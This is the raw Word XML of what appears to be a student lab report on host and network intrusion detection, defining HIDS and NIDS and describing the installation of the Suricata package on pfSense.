            <w:r w:rsidRPr="00AB5F19">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EC0C105" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BD37A2" w14:textId="230C08F6" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC0874E" w14:textId="38138F2E" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6168BB5D" w14:textId="09E8CEF5" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43583D42" w14:textId="2B32E5EB" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAB3326" w14:textId="74D61D48" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552E433F" w14:textId="6AD6BDE6" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3FFD9E" w14:textId="70F160F3" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77214036" w14:textId="51A95439" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6810EB3E" w14:textId="6C1D8FE0" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452562DC" w14:textId="464E6DB5" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D3A626" w14:textId="5799E123" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455ED3AE" w14:textId="61EB9D7D" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2705B81A" w14:textId="2174824E" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB7C168" w14:textId="5D8368CE" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15587F41" w14:textId="7F16A0F9" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222A71C9" w14:textId="515BF347" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F90BAAA" w14:textId="7E55FDB8" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F3869C" w14:textId="707FF7CB" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785220E0" w14:textId="01C43494" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F21C756" w14:textId="2DE92994" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64ECDC7E" w14:textId="6DD3C3C8" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700AD314" w14:textId="6A50972E" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C4B5B9" w14:textId="057C5746" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2CBC79" w14:textId="65472F98" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F9B88D" w14:textId="6529ED5C" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1483D13E" w14:textId="1FFF03CD" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1541A5DE" w14:textId="1284F9B0" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126B85B8" w14:textId="77777777" w:rsidR="00A15DF8" w:rsidRPr="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38755EA7" w14:textId="09BD004B" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C0E5A2" w14:textId="77777777" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB4BED4" w14:textId="4A09B4AA" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7164BC17" w14:textId="4090B27F" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1C7A99" w14:textId="77777777" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609D2094" w14:textId="00444FBB" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc114777178"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 2.2</w:t>
      </w:r>
      <w:r w:rsidR="006F531D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="006F531D" w:rsidRPr="006F531D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Host Intrusion Detection and Prevention (HIDS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="42A221A8" w14:textId="77777777" w:rsidR="00AB52F3" w:rsidRPr="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C635FD" w14:textId="131325C8" w:rsidR="007C322B" w:rsidRPr="00A73FE2" w:rsidRDefault="007C322B" w:rsidP="007C322B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc114777179"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Host Intrusion Detection and Prevention</w:t>
      </w:r>
      <w:r w:rsidR="002A3A42" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> System</w:t>
      </w:r>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HIDS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-U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1BEA72E4" w:rsidR="00693CC2" w:rsidRPr="00AB52F3" w:rsidRDefault="00DD3B4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B52F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Intrusion Detection </w:t>
      </w:r>
      <w:r w:rsidR="002A3A42" w:rsidRPr="00AB52F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">System </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB52F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(IDS) is a method that strengthen the security against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB52F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>cyber crimes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB52F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. It </w:t>
      </w:r>
      <w:r w:rsidR="00693CC2" w:rsidRPr="00AB52F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-U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Intrusion Preventing System (</w:t>
      </w:r>
      <w:r w:rsidR="002A3A42" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00693CC2" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> could do both, alerting and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidR="00693CC2" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-U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 Host Intrusion Detection </w:t>
      </w:r>
      <w:r w:rsidR="008B0563" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-U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HIDS </w:t>
      </w:r>
      <w:r w:rsidR="004F4AF6" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">monitors </w:t>
      </w:r>
      <w:r w:rsidR="004F4AF6" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-U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NIDS monitors a network segment. </w:t>
      </w:r>
      <w:r w:rsidR="00F351FA" w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-U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Why would you need to use HIDS when you can just use NIDS to monitor all the devices in the network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA203A" w14:textId="69C27811" w:rsidR="00693CC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sidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-U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US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">a better option. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64850BCD" w14:textId="5F229954" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F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p>
    <w:p w14:paraId="4D610DE5" w14:textId="64F1AFD2" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="00AB52F3">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Suricata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D044D88" w14:textId="41A232A1" w:rsid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lastRenderedPageBreak/>
        <w:t xml:space="preserve">For network-IDS I decided to use Suricata package as it is available in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and free to install. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D19D7" w14:textId="583A9713" w:rsidR="000F3881" w:rsidRPr="000F3881" w:rsidRDefault="000F3881" w:rsidP="000F3881">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AA6FB9E" wp14:editId="7D3E406D">
            <wp:extent cx="5725160" cy="3578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578225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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US" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A40ACAE" w14:textId="5542FDEC" w:rsidR="00DD3B43" w:rsidRDefault="000F3881"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n my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, I set up 3 interfaces </w:t>
      </w:r>
      <w:r w:rsidR="002512B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">for my local network. I also set up 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002512B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>wirefalls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002512B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. The next step is setting up IDS. I could find the Suricata package in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002512B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002512B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-System-Package Manager- Available Packages. Then I searched for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002512B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002512B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I installed it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061435C8" w14:textId="7DEAE661"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278C2123" wp14:editId="37DB94DE">
            <wp:extent cx="5725160" cy="25126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5B38B687" w14:textId="24FDCB88" w:rsidR="00DD3B43"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3775E0C5" w14:textId="403CC088"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75B2E883" w14:textId="6B8ED1E3" w:rsidR="002512B5"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6116EBAC" w14:textId="77777777"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00F3ECDC" w:rsidR="00DD3B43"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color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">I setup 3 IDS for every interface. However, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="2D3B45"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> says disabled so I still need to enable it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D276D6" w14:textId="18F5B3C2" w:rsidR="002512B5" w:rsidRPr="00A73FE2" w:rsidRDefault="002512B5"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r>
        <w:rPr>
